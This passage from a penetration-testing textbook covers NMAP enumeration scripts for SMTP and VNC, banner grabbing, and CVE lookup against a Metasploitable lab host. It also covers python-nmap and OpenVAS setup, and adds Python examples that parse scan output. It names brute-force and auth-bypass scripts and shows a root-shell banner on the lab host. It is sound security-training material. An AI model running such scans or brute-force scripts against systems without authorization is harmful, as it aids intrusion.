The following are some additional NMAP scripts for SMTP enumeration: 
• smtp-enum-users 
• smtp-commands 
• smtp-brute 
• smtp-ntlm-info 
• smtp-strangeport 
• smtp-vuln-cve2011-1764 



VNC Enumeration 


The Virtual Network Computing (VNC) protocol is commonly used for 
remote graphical desktop sharing. It runs on port 5900 by default. NMAP 
has several scripts for enumerating the VNC service. Figure 1-28 shows the 
output of the vnc-info script. It shows the RFB protocol version (3.3 in the 
figure) along with the security types the server offers; here it is VNC 
Authentication (type 2), a password challenge, whereas a security type of 
None would mean the desktop is reachable without any password. 

[Figure 1-28 screenshot: Zenmap, Command: nmap --script vnc-info 192.168.25.129. 
Recovered output:] 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-19 15:13 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.0044s latency). 
Not shown: 977 closed ports 
PORT     STATE SERVICE 
21/tcp   open  ftp 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
53/tcp   open  domain 
80/tcp   open  http 
111/tcp  open  rpcbind 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
512/tcp  open  exec 
513/tcp  open  login 
514/tcp  open  shell 
1099/tcp open  rmiregistry 
1524/tcp open  ingreslock 
2049/tcp open  nfs 
2121/tcp open  ccproxy-ftp 
3306/tcp open  mysql 
5432/tcp open  postgresql 
5900/tcp open  vnc 
| vnc-info: 
|   Protocol version: 3.3 
|   Security types: 
|_    VNC Authentication (2) 
6000/tcp open  X11 
6667/tcp open  irc 
8009/tcp open  ajp13 
8180/tcp open  unknown 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 1.70 seconds 
Figure 1-28. Output of NMAP script vnc-info executed against a 
target IP address 
The following are some additional NMAP scripts for VNC enumeration: 
• vnc-brute 
• realvnc-auth-bypass 
• vnc-title 


Service Banner Grabbing 


Most services send a banner as soon as a client connects. A banner normally 
contains the server software and version and may even contain 
organization-specific information such as disclaimers, warnings, or corporate 
e-mail addresses. It is certainly worthwhile to grab service banners to get 
more information about the target. The NMAP script banner connects to every 
open port on the target and prints whatever the service sends first, as shown 
in Figure 1-29. For binary protocols such as MySQL the banner appears as 
escaped bytes, and for protocols where the client must speak first, such as 
HTTP, nothing is shown; in those cases the -sV version-detection probes are 
more informative. 
[Figure 1-29 screenshot: Zenmap, Command: nmap --script banner 192.168.25.129. 
Recovered output:] 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-28 11:35 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.00067s latency). 
Not shown: 977 closed ports 
PORT     STATE SERVICE 
21/tcp   open  ftp 
|_banner: 220 (vsFTPd 2.3.4) 
22/tcp   open  ssh 
|_banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 
23/tcp   open  telnet 
|_banner: \xFF\xFD\x18\xFF\xFD \xFF\xFD#\xFF\xFD' 
25/tcp   open  smtp 
|_banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu) 
53/tcp   open  domain 
80/tcp   open  http 
111/tcp  open  rpcbind 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
512/tcp  open  exec 
|_banner: \x01Where are you? 
513/tcp  open  login 
514/tcp  open  shell 
1099/tcp open  rmiregistry 
1524/tcp open  ingreslock 
|_banner: root@metasploitable:/# 
2049/tcp open  nfs 
2121/tcp open  ccproxy-ftp 
|_banner: 220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.25.129] 
3306/tcp open  mysql 
|_banner: (binary MySQL greeting, shown as escaped bytes; contains the version string 5.0.51a-3ubuntu5) 
5432/tcp open  postgresql 
5900/tcp open  vnc 
|_banner: RFB 003.003 
6000/tcp open  X11 
6667/tcp open  irc 
| banner: :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname... 
|_\x0D\x0A:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resol... 
8009/tcp open  ajp13 
8180/tcp open  unknown 
MAC Address: 00:0C:29:11:8E:B1 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 17.19 seconds 
Figure 1-29. Output of NMAP script banner executed against a 
target IP address 


Detecting Vulnerabilities 


So far, you have seen the NMAP capabilities of port scanning and 
enumeration. Now you'll see how NMAP can be used for conducting basic 
vulnerability assessments. Though not as comprehensive as vulnerability 
scanners like Nessus and OpenVAS, NMAP can certainly do version-based 
vulnerability detection. It takes the product and version strings that -sV 
detects, maps them to CPE identifiers, and looks up the Common 
Vulnerabilities and Exposures (CVE) entries recorded against those CPEs. 
To turn NMAP into a vulnerability scanner, you first need to download and 
install some additional scripts. Figure 1-30 shows the installation of the 
required scripts. You first navigate to the directory /usr/share/nmap/scripts 
and then clone two git repositories, as shown here: 

• https://github.com/vulnersCom/nmap-vulners.git 
• https://github.com/scipag/vulscan.git 


root@kali:~# cd /usr/share/nmap/scripts/ 
root@kali:/usr/share/nmap/scripts# git clone https://github.com/vulnersCom/nmap-vulners.git 
Cloning into 'nmap-vulners'... 
remote: Enumerating objects: 40, done. 
remote: Total 40 (delta 0), reused 0 (delta 0), pack-reused 40 
Unpacking objects: 100% (40/40), done. 
root@kali:/usr/share/nmap/scripts# git clone https://github.com/scipag/vulscan.git 
Cloning into 'vulscan'... 
remote: Enumerating objects: 231, done. 
remote: Total 231 (delta 0), reused 0 (delta 0), pack-reused 231 
Receiving objects: 100% (231/231), 13.41 MiB | 232.00 KiB/s, done. 
Resolving deltas: 100% (144/144), done. 
root@kali:/usr/share/nmap/scripts# 
Figure 1-30. Git cloning nmap-vulners into local directory 


Once you have downloaded the required scripts, you are all set to 
execute them against the target. You can use the command nmap -sV --script 
nmap-vulners <target IP address>, as shown in Figure 1-31. The -sV option 
is required, because the script looks up the version (CPE) that service 
detection produces. Note that the vulners script queries the vulners.com 
API over the Internet for each detected CPE, so it needs outbound 
connectivity and discloses the target's software inventory to a third 
party; vulscan, by contrast, ships its own offline vulnerability databases 
and is invoked with --script vulscan/vulscan.nse. 
[Figure 1-31 screenshot: Zenmap, Command: nmap -sV --script nmap-vulners 192.168.25.129. 
Recovered output:] 
Starting Nmap 7.60 ( https://nmap.org ) at 2018-09-21 14:30 IST 
Nmap scan report for 192.168.25.129 
Host is up (0.00028s latency). 
Not shown: 977 closed ports 
PORT   STATE SERVICE VERSION 
21/tcp open  ftp     vsftpd 2.3.4 
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 
23/tcp open  telnet  Linux telnetd 
25/tcp open  smtp    Postfix smtpd 
53/tcp open  domain  ISC BIND 9.4.2 
| vulners: 
|   cpe:/a:isc:bind:9.4.2: 
|     <CVE ID>    <CVSS score>    https://vulners.com/cve/<CVE ID> 
|     (about thirty entries; the IDs legible in the screenshot include CVE-2008-0122, 
|     CVE-2012-1667, CVE-2012-3817, CVE-2012-4244, CVE-2014-8500, CVE-2012-5166, 
|     CVE-2015-8461, CVE-2015-8704, CVE-2016-1286, CVE-2016-9131, CVE-2016-2848, 
|     CVE-2016-9444, CVE-2011-4313, CVE-2016-1285, CVE-2016-2775 and CVE-2009-4022; 
|_    the CVSS score column is not legible in the extracted text) 
Figure 1-31. Output of NMAP script nmap-vulners executed against 
a target IP address 


Interestingly, you can see many CVEs, each with a CVSS score and a 
vulners.com reference, listed against the ISC BIND 9.4.2 running on TCP 
port 53. You can also see several CVEs for TCP port 80 running the Apache 
httpd 2.2.8 server, as shown in Figure 1-32. This CVE information is a 
starting point for further exploitation, not a verified finding: the match is 
made on the version string alone, so a distribution that backports fixes 
without changing the version number will show CVEs that are already patched, 
and a CVE may concern a module or feature the target does not use. Each 
entry still has to be confirmed, for example with a dedicated NSE vuln 
script, with Metasploit, or with OpenVAS. 
[Figure 1-32 screenshot: Zenmap, Command: nmap -sV --script nmap-vulners 192.168.25.129, 
scrolled to port 80. Recovered output:] 
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2) 
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 
| vulners: 
|   cpe:/a:apache:http_server:2.2.8: 
|     CVE-2010-0425    10.0    https://vulners.com/cve/CVE-2010-0425 
|     <CVE ID>    <CVSS score>    https://vulners.com/cve/<CVE ID> 
|     (further entries with lower scores; the IDs legible in the screenshot include 
|     CVE-2011-3192, CVE-2017-7679, CVE-2013-2249, CVE-2009-1891, CVE-2012-0883, 
|     CVE-2009-3555, CVE-2013-1862, CVE-2007-6750, CVE-2014-0098, CVE-2009-2699, 
|     CVE-2013-6438, CVE-2011-3368, CVE-2008-2364, CVE-2014-0231, CVE-2010-0408, 
|     CVE-2010-1452, CVE-2009-1195, CVE-2012-0031, CVE-2011-3607, CVE-2012-4558, 
|     CVE-2010-0434, CVE-2012-3499, CVE-2011-0419, CVE-2013-1896, CVE-2011-3348, 
|     CVE-2008-2939, CVE-2011-3639, CVE-2011-4317, CVE-2012-0053, CVE-2016-8612, 
|_    CVE-2012-2687 and CVE-2011-4415; the remaining scores are not legible) 
Figure 1-32. Output of NMAP script nmap-vulners executed against 
a target IP address 
NMAP Output 


So far, you have seen various useful NMAP features. It is important to 
note that the output produced by NMAP can be fed to many other security 
tools and products. Hence, you must be aware of the different output formats 
that NMAP is capable of producing, shown here: 


Switch            Example                                          Description 
-oN               nmap 192.168.25.129 -oN output.txt               Performs a scan on a target IP address and writes normal (human-readable) output to the file output.txt 
-oX               nmap 192.168.25.129 -oX output.xml               Performs a scan on a target IP address and writes XML output to the file output.xml; this is the format most other tools consume, for example Metasploit's db_import and the python-nmap library 
-oG               nmap 192.168.25.129 -oG output.grep              Performs a scan on a target IP address and writes greppable output (one line per host) to the file output.grep, convenient for grep and awk 
-oA               nmap 192.168.25.129 -oA output                   Performs a scan and writes all three formats at once, as output.nmap, output.xml, and output.gnmap 
--append-output   nmap 192.168.25.129 -oN file.file --append-output  Performs a scan on a target IP address and appends the output to an existing output file instead of overwriting it 
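The XML format is the one to use when NMAP results feed other tooling, and 
NSE script results travel in it too: each script's text lands in the "output" 
attribute of a script element under the port it ran against. The following 
Python is an added example, not code from the book or from the NMAP project. 
It parses -oX output with the standard library and turns the ftp-anon, 
smtp-open-relay and http-methods results shown earlier in this chapter 
(Figures 1-18, 1-22 and 1-27) into a list of findings. The sample XML is 
constructed for the example: the 192.168.25.129 entries mirror the 
Metasploitable results from the figures, while host 10.0.0.5 and its results 
are hypothetical, added so that each check has a positive case. The strings 
matched in findings() are what those three scripts print; the set of methods 
treated as risky is this example's choice.

```python
"""Parse nmap -oX output and extract findings from NSE script results."""
import re
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX XML format. 192.168.25.129 mirrors the
# Metasploitable output in the chapter's figures; 10.0.0.5 is a hypothetical host
# whose results are made up so each check below has something to flag.
SAMPLE_XML = """\
<nmaprun scanner="nmap" args="nmap -sV --script ftp-anon,http-methods,smtp-open-relay -oX - 192.168.25.129 10.0.0.5" version="7.60">
<host><status state="up" reason="arp-response"/>
<address addr="192.168.25.129" addrtype="ipv4"/>
<address addr="00:0C:29:11:8E:B1" addrtype="mac" vendor="VMware"/>
<ports>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/>
<service name="ftp" product="vsftpd" version="2.3.4"/>
<script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/></port>
<port protocol="tcp" portid="25"><state state="open" reason="syn-ack"/>
<service name="smtp" product="Postfix smtpd"/>
<script id="smtp-open-relay" output="Server doesn't seem to be an open relay, all tests failed"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
<service name="http" product="Apache httpd" version="2.2.8"/>
<script id="http-methods" output="&#10;  Supported Methods: GET HEAD POST OPTIONS"/></port>
<port protocol="tcp" portid="3306"><state state="closed" reason="reset"/>
<service name="mysql"/></port>
</ports></host>
<host><status state="up" reason="echo-reply"/>
<address addr="10.0.0.5" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="25"><state state="open" reason="syn-ack"/>
<service name="smtp"/>
<script id="smtp-open-relay" output="Server is an open relay (16/16 tests)"/></port>
<port protocol="tcp" portid="8080"><state state="open" reason="syn-ack"/>
<service name="http"/>
<script id="http-methods" output="&#10;  Supported Methods: GET HEAD POST PUT DELETE OPTIONS&#10;  Potentially risky methods: PUT DELETE"/></port>
</ports></host>
<runstats><finished elapsed="2.30"/><hosts up="2" down="0" total="2"/></runstats>
</nmaprun>
"""

# HTTP methods this example treats as worth a finding (policy choice).
RISKY_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}


def parse_nmap_xml(xml_text):
    """Return a list of {addr, ports:[{port, proto, service, product, scripts}]}
    for every host that is up, keeping only open ports."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        if host.find("status").get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        ports = []
        for port in host.findall("ports/port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(x for x in (svc.get("product"), svc.get("version")) if x)
            ports.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else None,
                "product": product,
                # NSE script results: script id -> the text the script printed
                "scripts": {s.get("id"): s.get("output") for s in port.findall("script")},
            })
        hosts.append({"addr": addr, "ports": ports})
    return hosts


def findings(hosts):
    """Turn script outputs into (address, port, finding) triples."""
    out = []
    for h in hosts:
        for p in h["ports"]:
            for sid, text in p["scripts"].items():
                if sid == "ftp-anon" and "Anonymous FTP login allowed" in text:
                    out.append((h["addr"], p["port"], "anonymous FTP login allowed"))
                elif sid == "smtp-open-relay" and "is an open relay" in text:
                    out.append((h["addr"], p["port"], "SMTP open relay: " + text.strip()))
                elif sid == "http-methods":
                    m = re.search(r"Supported Methods: (.+)", text)
                    methods = set(m.group(1).split()) if m else set()
                    risky = sorted(methods & RISKY_METHODS)
                    if risky:
                        out.append((h["addr"], p["port"],
                                    "risky HTTP methods: " + " ".join(risky)))
    return out


if __name__ == "__main__":
    for addr, port, what in findings(parse_nmap_xml(SAMPLE_XML)):
        print("%s:%d  %s" % (addr, port, what))
```

With a real scan, replace SAMPLE_XML by the contents of the file written with -oX (or read nmap's standard output when -oX - is used); the same parser also exposes the version strings that the vulners lookup in the previous section depends on.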


NMAP and Python 


Throughout this chapter you have seen numerous capabilities of NMAP 
and how NMAP can be used effectively for information gathering, 
enumeration, and active scanning. NMAP can also be invoked and 
executed from various programming languages, making it even more 
powerful. Python is an interpreted high-level programming language 
for general-purpose programming. Python is user-friendly and extremely 
flexible, and it has a rich set of ready-to-use libraries for performing 
various tasks. Getting into the details of Python language basics and 
syntax is beyond the scope of this book. Assuming you have some basic 
knowledge of Python, this section will discuss how you can use Python 
to invoke and automate NMAP scans. 

Python is installed by default on most Unix-based systems. However, 
you need to install the python-nmap library separately. On Kali Linux, or 
any system with pip, use the command pip install python-nmap, as shown in 
Figure 1-33. The library is a wrapper: it runs the nmap binary with -oX - 
and parses the XML that comes back, so nmap itself must be installed, and 
scans that need raw sockets (such as SYN scans and OS detection) still have 
to run as root. The figure uses Python 2.7; the same steps work under 
Python 3 with pip3. 


root@kali:~# pip install python-nmap 
Collecting python-nmap 
  Downloading python-nmap-0.6.1.tar.gz (41kB) 
Building wheels for collected packages: python-nmap 
  Running setup.py bdist_wheel for python-nmap ... done 
Successfully built python-nmap 
Installing collected packages: python-nmap 
Successfully installed python-nmap-0.6.1 
root@kali:~# 


Figure 1-33. Installing the python-nmap library on a Debian-based 
system 


Now that you have installed the required NMAP library, start the 
Python interpreter from the terminal by typing the python command, and 
import the NMAP library, as shown here: 


root@kali:~# python 
Python 2.7.14+ (default, Dec  5 2017, 15:17:02) 
[GCC 7.2.0] on linux2 
Type "help", "copyright", "credits" or "license" for more information. 
>>> import nmap 
>>> 


You can now create a new PortScanner object named nmp. Then initiate 
a new scan of the target IP address 127.0.0.1 on ports 1 to 50, as 
shown here: 


>>> nmp = nmap.PortScanner() 
>>> nmp.scan('127.0.0.1', '1-50') 


The scan completes and gives you the following output: 


{'nmap': {'scanstats': {'uphosts': '1', 'timestr': 'Fri Sep 
21 14:02:19 2018', 'downhosts': '0', 'totalhosts': '1', 
'elapsed': '1.06'}, 'scaninfo': {'tcp': {'services': '1-50', 
'method': 'syn'}}, 'commandline': 'nmap -oX - -p 1-50 -sV 
127.0.0.1'}, 'scan': {'127.0.0.1': {'status': {'state': 'up', 
'reason': 'localhost-response'}, 'hostnames': [{'type': 'PTR', 
'name': 'localhost'}], 'vendor': {}, 'addresses': {'ipv4': 
'127.0.0.1'}, 'tcp': {22: {'product': 'OpenSSH', 'state': 
'open', 'version': '7.7p1 Debian 4', 'name': 'ssh', 'conf': 
'10', 'extrainfo': 'protocol 2.0', 'reason': 'syn-ack', 'cpe': 
'cpe:/o:linux:linux_kernel'}}}}} 


Though the previous output is raw, it can certainly be formatted using 
many of the Python functions. Once you have run the initial scan, you can 
explore different functions to retrieve specific scan details. 


scaninfo() 


The scaninfo() function returns scan details such as the method used and 
the port range probed. 


>>> nmp.scaninfo() 
{'tcp': {'services': '1-1024', 'method': 'syn'}} 
all_hosts() 


The all_hosts() function returns the list of all IP addresses scanned. 


>>> nmp.all_hosts() 
['192.168.25.129'] 


state() 


The state() function returns the state of the IP/host scanned, such as 
whether it’s up or down. 


>>> nmp['192.168.25.129'].state() 
'up' 


keys() 

The keys() function returns a list of all open ports found during the scan. 


>>> nmp['192.168.25.129']['tcp'].keys() 
[512, 513, 514, 139, 111, 80, 53, 22, 23, 25, 445, 21] 


has_tcp() 


The has_tcp() function checks whether a particular port was found open 
during the scan on the target IP address. 


>>> nmp['192.168.25.129'].has_tcp(22) 
True 


command_line() 


The command_line() function returns the exact NMAP command that ran 
in the background to produce the output. 


>>> nmp.command_line() 
'nmap -oX - -p 1-50 -sV 127.0.0.1' 


hostname() 


The hostname() function returns the host name of the IP address that you 
pass as an argument. 


>>> nmp['127.0.0.1'].hostname() 
'localhost' 


all_protocols() 


The all_protocols() function returns the list of protocols supported by the 
target IP address. 


>>> nmp['127.0.0.1'].all_protocols() 
['tcp'] 

Now that you know the basic functions to invoke NMAP from Python, 
you can write some simple Python code that uses a loop to scan multiple 
IP addresses. Then you can use various text processing functions to clean 
and format the output. 
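As an added example (not the book's code), here is a small script that does what the paragraph describes: it loops python-nmap over several hosts and reformats the raw result dictionary into a readable summary. Live scanning assumes the python-nmap library and the nmap binary are installed; the summariser is exercised on a constructed result in the same shape as the 127.0.0.1 output shown above, and all function names are my own.

```python
"""Loop python-nmap over several hosts and tidy the raw result dictionary.

Added example, not code from the book. scan_hosts() needs the python-nmap
library (import nmap) and the nmap binary; summarize_scan() only needs the
dictionary that PortScanner.scan() returns, so it runs here on a constructed
sample shaped like the chapter's 127.0.0.1 output.
"""


def summarize_scan(result):
    """Turn the raw dict from PortScanner.scan() into one record per host.

    Only TCP ports whose state is 'open' are listed: a port can appear in
    the 'tcp' dict (so has_tcp() returns True) while being closed or
    filtered, so the state field is checked explicitly.
    """
    summary = []
    for ip, host in sorted(result.get("scan", {}).items()):
        hostnames = [h["name"] for h in host.get("hostnames", []) if h.get("name")]
        open_ports = []
        for port in sorted(host.get("tcp", {})):
            info = host["tcp"][port]
            if info.get("state") != "open":
                continue
            # Join "product version", skipping empty pieces so unidentified
            # services do not leave stray spaces in the output.
            service = " ".join(p for p in (info.get("product"), info.get("version")) if p)
            open_ports.append({"port": port, "name": info.get("name", ""), "service": service})
        summary.append({
            "ip": ip,
            "state": host.get("status", {}).get("state", "unknown"),
            "hostname": hostnames[0] if hostnames else "",
            "open_ports": open_ports,
        })
    return summary


def format_summary(summary):
    """Render the summary as plain text, one block per host."""
    lines = []
    for host in summary:
        label = host["ip"] + (" (%s)" % host["hostname"] if host["hostname"] else "")
        lines.append("%s is %s, %d open TCP port(s)" % (label, host["state"], len(host["open_ports"])))
        for p in host["open_ports"]:
            lines.append("  %5d/tcp  %-8s %s" % (p["port"], p["name"], p["service"]))
    return "\n".join(lines)


def scan_hosts(hosts, ports="1-1024", arguments="-sV"):
    """Run one python-nmap scan per host and merge the per-host results."""
    import nmap  # imported here so the summariser works without python-nmap installed

    merged = {"scan": {}}
    scanner = nmap.PortScanner()
    for host in hosts:
        result = scanner.scan(host, ports, arguments=arguments)
        merged["scan"].update(result.get("scan", {}))
    return merged


# Constructed sample in the shape of the chapter's 127.0.0.1 output, with a
# second (documentation-range) host so the multi-host path is exercised.
SAMPLE_RESULT = {
    "nmap": {"command_line": "nmap -oX - -p 1-50 -sV 127.0.0.1 192.0.2.10",
             "scaninfo": {"tcp": {"method": "syn", "services": "1-50"}}},
    "scan": {
        "127.0.0.1": {
            "status": {"state": "up", "reason": "localhost-response"},
            "hostnames": [{"type": "PTR", "name": "localhost"}],
            "addresses": {"ipv4": "127.0.0.1"},
            "tcp": {
                22: {"state": "open", "name": "ssh", "product": "OpenSSH",
                     "version": "7.7p1 Debian 4", "reason": "syn-ack"},
                25: {"state": "filtered", "name": "smtp", "product": "", "version": ""},
            },
        },
        "192.0.2.10": {
            "status": {"state": "up", "reason": "echo-reply"},
            "hostnames": [{"type": "", "name": ""}],
            "addresses": {"ipv4": "192.0.2.10"},
            "tcp": {
                80: {"state": "open", "name": "http", "product": "Apache httpd", "version": ""},
                23: {"state": "closed", "name": "telnet", "product": "", "version": ""},
            },
        },
    },
}

if __name__ == "__main__":
    # For a live run replace SAMPLE_RESULT with scan_hosts(["127.0.0.1"], "1-50").
    print(format_summary(summarize_scan(SAMPLE_RESULT)))
```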


Summary 


In this chapter, you learned about the concepts of vulnerability assessment 
and penetration testing. You now understand the different phases of the 
penetration testing lifecycle and the importance of NMAP, OpenVAS, and 
Metasploit, which are capable of performing most of the tasks across all 
phases of the penetration testing lifecycle. 

This chapter briefed you on the absolute basics and essentials of 
the NMAP tool and gave insights into how the NMAP capabilities can be 
extended using scripts. The chapter also touched on integrating NMAP with 
Python scripting. 


Do-It-Yourself (DIY) Exercises 


Install NMAP on Windows and Ubuntu. 


Perform a UDP scan on a target system using the 
NMAP command line. 


Use NMAP to detect the operating system on the target 
system. 


Use an NMAP intense scan on a target system. 


Use various NMAP scripts for enumerating services on 
a target system. 


Write some Python code that scans ports 1 to 500 on a 
target system. 
OpenVAS 


In the previous chapter, you learned about NMAP and its capabilities. 
In this chapter, you'll learn about how OpenVAS can be used to perform 
vulnerability assessments. Specifically, this chapter covers the following: 


• Introduction to OpenVAS 

• Setting up OpenVAS 

• Importing NMAP results into OpenVAS 

• Vulnerability scanning 

• Reporting 


Note The purpose of OpenVAS is limited to vulnerability scanning, 
unlike NMAP and Metasploit, which are capable of doing many more 
things. From this perspective, all the essential OpenVAS tasks are 
covered in this chapter. This will prepare you for the integration of 
OpenVAS with Metasploit in the next chapter, where the real fun 
starts. 


© Sagar Rahalkar 2019 
S. Rahalkar, Quick Start Guide to Penetration Testing, 
https://doi.org/10.1007/978-1-4842-4270-4_2 
Introduction to OpenVAS 


In the previous chapter, you learned about NMAP. NMAP is a tool that is 
much more than just a port scanner. For example, you used NMAP for 
vulnerability detection. However, it has certain limitations. NMAP mainly 
detects only limited known CVEs. Hence, you certainly need a better 
solution for performing a vulnerability assessment. Here are a few of the 
popular choices: 


• Nessus 

• Nexpose 

• QualysGuard 

• OpenVAS 


These products are mature and used widely in the industry. For the 
scope of this book, you will be learning about the OpenVAS platform. It is 
free for community use and offers many useful features. 

OpenVAS is an abbreviation for Open Vulnerability Assessment 
System. It is not just a tool but a complete framework consisting of several 
services and tools, offering a comprehensive and powerful vulnerability 
scanning and vulnerability management solution. 

Just as an antivirus solution has signatures to detect known malware, 
OpenVAS has a set of network vulnerability tests (NVTs). The NVTs are 
implemented as plug-ins, which are written in Nessus Attack 
Scripting Language (NASL) code. There are more than 50,000 NVTs in 
OpenVAS, and new NVTs are being added on a regular basis. 
Installation 


OpenVAS comes with multiple installation options, including the Docker 
container. It can be installed on various operating systems. However, the 
easiest and fastest way of getting started with OpenVAS is to download the 
OpenVAS virtual appliance. The OpenVAS virtual appliance ISO image can 
be downloaded from https://www.greenbone.net/en/install_use_gce/. 

The benefit of using this virtual appliance is it already has all the 
dependencies in place and everything set up. All you need to do is 
download the ISO image, boot it in VMware/VirtualBox, and set up some 
basic things, and OpenVAS will be up and running in no time. 

Once you boot the downloaded ISO, you can get started by selecting 
the Setup option, as shown in Figure 2-1. 


Greenbone Security Manager Setup - Build #435 

Start setting up your GSM 
Figure 2-1. OpenVAS VM initial install screen 


The setup then initiates, as shown in Figure 2-2. 
Greenbone Security Manager Setup - Build #435 


Installation in progress... 
Your GSM Community Edition is now being prepared. 


Please visit www.greenbone.net to learn more about commercial 
GSM appliances that solve all levels of enterprise needs. For 
example secure airgap-updates for disconnected networks or 
connectivity with other security systems. 


Figure 2-2. OpenVAS installation and setup 


Now you need to create a new user that you will be using for 
administrative purposes, as shown in Figure 2-3. 


Admin user 
Please choose the username for the administrative user 

[admin] 

< OK > <Cancel> 


Figure 2-3. Setting up a user for the Open VAS administrator 


Then you set a password for the newly created user, as shown in 
Figure 2-4. 
Admin password 
Please enter the password for the administrative user. If you 
leave it empty, a random one will be generated for you. 

< OK > <Cancel> 


Figure 2-4. Setting up a password for the OpenVAS administrative 
user 


Once you have set up the administrative credentials, the installation 
reboots, and you are presented with the boot menu, as shown in Figure 2-5. 


*Greenbone OS 


Figure 2-5. OpenVAS boot menu 
Next, you will see the command-line console, as shown in Figure 2-6, 
where you need to enter the previously set credentials. 


Welcome to Greenbone OS 4.2 (tty1) 
The web interface is available at: 
http://192.168.25.136 

gsm login: _ 


Figure 2-6. OpenVAS virtual machine command-line console 


You can see that the OpenVAS setup is complete, and its web interface 
has been made available at http://192.168.25.136. You can try accessing 
the web interface, as shown in Figure 2-7. 


Figure 2-7. OpenVAS web interface with login fields 
Meanwhile, you need to boot into the OS and make a few additional 
setting changes, as shown in Figure 2-8. 


Greenbone OS Administration 


Setup Wizard 
Your GSM is not fully functional yet. Do you 
want to complete the setup now? 


By pressing ’Cancel’, this question will not 
be asked again. 


< No > <Cancel> 


Figure 2-8. OpenVAS setup and user configuration 


You need to create a new admin user and set the username and 
password, as shown in Figure 2-9. 


Greenbone OS Administration 

Create a new Admin 

Account name 
Account password 
Account password confirmation 

< OK > <Cancel> 


Figure 2-9. OpenVAS virtual machine user configuration 


The OpenVAS version you are using is the community edition, and it 
doesn't require any key. However, if you wanted to use the commercial 
version, then you would need to enter the subscription key. For now, you 
can skip this step, as shown in Figure 2-10. 


Greenbone OS Administration 


There is no Subscription Key for the Greenbone Security Feed installed. 


Either you can skip this step and continue with the Community Feed. This feed is not as 
current and not as complete as the Greenbone Security Feed. But all is there for an immediate 
start. 

Or you can activate a Subscription Key for the Greenbone Security Feed. If you are a customer, 
you should have one at hand. If not, please contact our Support. As a commercial user you can 
request an evaluation subscription key (valid for 14 days) via www.greenbone.net or by sending 
an email to sales@greenbone.net. Please understand that we can only consider requests with 
full commercial contact details. 

Open an Editor to Paste the Key 
Upload the key via HTTP 


Figure 2-10. OpenVAS subscription key upload screen 
OpenVAS Administration 


In the previous section, you saw how to set up OpenVAS by downloading 
the ready-to-use virtual machine setup. Now, before you get into the actual 
scanning part, you need to set up a few things as part of administration. 


Feed Update 


Feeds are an absolutely essential component of OpenVAS. If your 
OpenVAS setup has old feeds, then you may miss out on detecting the 
latest vulnerabilities. Hence, it’s crucial to have the latest feeds in place 
before you initiate any scan. To check the current feed version, go to Extras 
» Feed Status, as shown in Figure 2-11. You can see that the feeds have not 
been updated for 54 days. 


Figure 2-11. OpenVAS feed status, with outdated feeds 


To update the feeds, go to the terminal and type the command 
openvas-feed-update, as shown in Figure 2-12. Just make sure you have 
an active Internet connection to update the feeds. 
root@kali:~# openvas-feed-update 
[>] Updating OpenVAS feeds 
[*] [1/3] Updating: NVT 
OpenVAS community feed server - http://www.openvas.org/ 
This service is hosted by Greenbone Networks - http://www.greenbone.net/ 
All transactions are logged. 

If you have any questions, please use the OpenVAS mailing lists 
or the OpenVAS IRC chat. See http://www.openvas.org/ for details. 

By using this service you agree to our terms and conditions. 
Only one sync per time, otherwise the source ip will be blocked. 
receiving incremental file list 
plugin_feed_info.inc 
          1,131 100%    1.08MB/s    0:00:00 (xfr#1, to-chk=0/1) 

sent 43 bytes  received 1,234 bytes  364.86 bytes/sec 
total size is 1,131  speedup is 0.89 
receiving incremental file list 

Figure 2-12. Updating the OpenVAS vulnerability feeds 
The feed update will take some time; once it's done, you can again go 
to the OpenVAS web interface and check the feed status. Now you should 
see that the feed status is current, as shown in Figure 2-13. 


Figure 2-13. OpenVAS feed status, updated 


User Management 


OpenVAS works in a client-server architecture, where multiple users 
can connect to a centralized server. Hence, it is important to create and 
manage users and groups. Before you create users, you need to have 
some user groups in place. To create new OpenVAS user groups, go to 
Administration > Groups, as shown in Figure 2-14. 


Figure 2-14. OpenVAS user management console 


Once you have created and configured the required groups, you 
can create new users and assign them to specific groups based on their 
privilege levels. To create a new user, go to Administration > Users, as 
shown in Figure 2-15. 
Figure 2-15. Adding new users into OpenVAS 


While OpenVAS allows you to create and manage users locally, it also 
allows you to connect with Lightweight Directory Access Protocol (LDAP) 
for centralized user management. It is possible to configure the LDAP 
settings by going to Administration > LDAP, as shown in Figure 2-16. 


Greenbone Security Assistant - Mozilla Firefox 

LDAP per-User Authentication 

Figure 2-16. OpenVAS configuration for LDAP authentication 
Similarly, OpenVAS can also be configured to authenticate against a 
RADIUS server. It can be done by configuring the RADIUS server settings 
at Administration > RADIUS, as shown in Figure 2-17. 


Greenbone Security Assistant - Mozilla Firefox 


Figure 2-17. OpenVAS configuration for RADIUS authentication 


Dashboard 


OpenVAS has a rich dashboard that is its home page by default. The 
